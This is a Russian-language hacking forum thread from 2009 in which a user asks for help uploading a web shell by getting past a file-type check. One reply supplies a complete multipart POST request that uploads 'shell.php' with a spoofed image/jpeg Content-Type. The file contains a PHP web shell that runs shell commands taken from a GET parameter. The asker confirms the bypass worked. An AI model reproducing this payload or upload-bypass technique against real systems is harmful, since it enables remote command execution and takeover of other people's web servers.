Помогите залить шелл

Discussion in 'Уязвимости' started by vld2008, 28 Dec 2009.

  1. vld2008

    vld2008 New Member

    Joined:
    30 Nov 2006
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    Помогите залить шелл (обойти $Filetype)

    не актуально
     
    #1 vld2008, 28 Dec 2009
    Last edited: 1 Oct 2015
  2. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    Эм... Послать POST-запрос, но в передаваемых данных указать image/gif.
     
  3. vld2008

    vld2008 New Member

    Joined:
    30 Nov 2006
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    можешь небольшой пример привести?
     
  4. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    304
    Likes Received:
    644
    Reputations:
    208
    То что ты дал - это не рабочий скрипт.Если быть точнее,он рабочий,если он куда то инклудиться,где и обозначаються фигурируемые там переменные.Если же нет,то если на сервере register_globals = on, то просто задай переменным нужное значение,и золей шелл таким образом.Но мне чтото подсказывает,что это только часть кода.
     
  5. vld2008

    vld2008 New Member

    Joined:
    30 Nov 2006
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    Хоть это и часть кода, он прекрасно заливает файлы (register_globals - ON, включены).
    Если добавить
    в запросе к нему. Но вот именно обойти тип файла для заливки не могу. Попробуйте у себя его запустить
     
    #5 vld2008, 29 Dec 2009
    Last edited: 1 Oct 2015
  6. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,509
    Likes Received:
    389
    Reputations:
    101
    Если расширение не проверяется, то можно заюзать что-нибудь типа такого запроса
    Code:
    POST http://127.0.0.1/upload/ HTTP/1.1
    Host: localhost
    Referer: http://127.0.0.1/index.php
    Cookie: PHPSESSID=$session_id
    Content-Length: 1024
    Content-Type: multipart/form-data; boundary="6G+f"
    
    --6G+f
    Content-Disposition: form-data; name="MAX_FILE_SIZE"
    
    100000
    --6G+f
    Content-Disposition: form-data; name="uploaded"; filename="shell.php"
    [b]Content-Type: image/jpeg[/b]
    
    <?php
      if (isset ($_GET['id']) && !empty ($_GET['id']))
        passthru ($_GET['id']);
      else
        echo "Empty";
    ?>
    --6G+f
    Content-Disposition: form-data; name="Upload"
    
    Upload
    --6G+f--
    
     
    3 people like this.
  7. vld2008

    vld2008 New Member

    Joined:
    30 Nov 2006
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    Йухуу, есть такое дело :)
    Спасибо, krypt3r
     
Loading...